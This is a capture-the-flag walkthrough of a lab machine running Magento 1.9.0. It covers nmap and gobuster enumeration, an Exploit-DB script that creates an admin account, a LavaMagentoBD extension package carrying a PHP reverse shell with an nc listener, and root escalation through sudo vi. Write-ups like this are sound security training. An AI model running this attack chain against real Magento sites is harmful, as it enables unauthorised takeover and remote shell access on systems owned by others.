Machine IP -- 10.10.10.140

Nmap Scan

nmap -Pn -v -sV -sC -A -p22,80 -oN nmap 10.10.10.140Nmap scan report for 10.10.10.140
Host is up (0.27s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
| 256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_ 256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 88733EE53676A47FC354A61C32516E82
| http-methods:
|_ Supported Methods: GET POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Linux 3.12 (93%), Linux 3.13 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 49.710 days (since Wed May 15 02:45:39 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 158.77 ms 10.10.12.1
2 277.90 ms 10.10.10.140NSE: Script Post-scanning.
Initiating NSE at 19:48
Completed NSE at 19:48, 0.00s elapsed
Initiating NSE at 19:48
Completed NSE at 19:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.01 seconds
Raw packets sent: 73 (4.916KB) | Rcvd: 742 (50.356KB)

While enumerating port 80. we found magento is running on it

Lets run gobuster on port 80 :

gobuster -u http://10.10.10.140/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log/media (Status: 301)
/includes (Status: 301)
/lib (Status: 301)
/app (Status: 301)
/js (Status: 301)
/shell (Status: 301)
/skin (Status: 301)
/var (Status: 301)
/errors (Status: 301)
/downloader (Status: 301)
/mage (Status: 200)

We got two usefull paths which are :- /app and /downloader

Well we found a login page at http://10.10.10.140/downloader so let’s check if it’s having some vulnerability which we can use to bypass login page

At the bottom of the login page we found the version of megento (magento v1.9.0) and luckily we found a exploit which makes a new admin user using remote code execution ,found{37977.py} at exploit db.

We have to do some editing in the script as we have to change the following things in script and then it will create a user forme:forme using this we can login .

vim 37977.py 
# add target target = "http://10.10.10.140/"
# now add path in this parametertarget_url = target + "/downlaoder":wq!

Then lets Run this exploit

python 377977.py

So now we had created a user forme:forme, now let’s login the page .

Now after logging into the magento connect manager, i tried every possible way to upload php reverse shell script but unable to upload php shell as it only accepts .tbz extension.after enumerating for a while i got another vulnerability, i found a lavalamp magento backdoor from github, downloaded it and edit.

Run below commands .

git clone https://github.com/lavalamp-/LavaMagentoBD.git
cd lavaMagentoBDcd\"backdoor code"

Now make a new directory with any name and put your php shell script in it and place your ip and port where you want to listen the reverse shell. after that we have one more useful changes in package.xml file,

Edited package.xml file

<?xml version="1.0"?>
<package>
<name>lavalamp_server_explorer</name>
<version>1.0.0</version>
<stability>stable</stability>
<license>GNU General Public License (GPL)</license>
<channel>community</channel>
<extends/>
<summary>Your server is under exploration</summary>
<description>Your server is under exploration</description>
<notes>Your server is under exploration</notes>
<authors>
<author>
<name>lavalamp</name>
<user>lavalamp</user>
<email>alavalamp@mailinator.com</email>
</author>
</authors>
<date>1970-01-01</date>
<time>00:00:00</time>
<contents>
<target name="mage">
<dir>
<dir name="name">
<file hash="42d1ac0f95daf2bf25aa77d498bb9175" name="shell.php"/>
</dir>


</dir>
</target>
</contents>
<compatible/>
<dependencies>
<required>
<php>
<min>5.2.0</min>
<max>6.0.0</max>
</php>
</required>
</dependencies>
</package>
  • name — your created directory name which has php shell script
  • shell.php — its my php reverse shell script putted in anyname(dir)
  • hash — now make a md5 sum of our shell.php and place the hash in the file .
md5sum shell.php 
42d1ac0f95daf2bf25aa77d498bb9175

remove all the extra contents from this file.

Next step is to make a tar of your directory and package.xml with .tbz , as it only accepts .tbz files , use below command for making .tbz tar file

tar -cvf anyname.tbz anyname(dir) package.xml

and then upload our file at webpage

Now let’s call for a reverse shell, turn your nc listener at the port you have given in the shell.php.

Now visit this path :

http://10.10.10.140/"directory"

Select you shell.php and then listen at your nc

nc -lvp 4455

YUP , we got shell of apache user.

POST EXPLOITATION :

Privilege escalation of this machine is do easy as we can clearly see using sudo -l that are having sudo permission at vi in /var/www/html/* folder .

As we can make root easy for us , because we know how to use vi for privilege escalation

sudo /usr/bin/vi /var/www/html/get.php:!bash

And yup here we got shell of root 😄

Security Researcher, Penetration Tester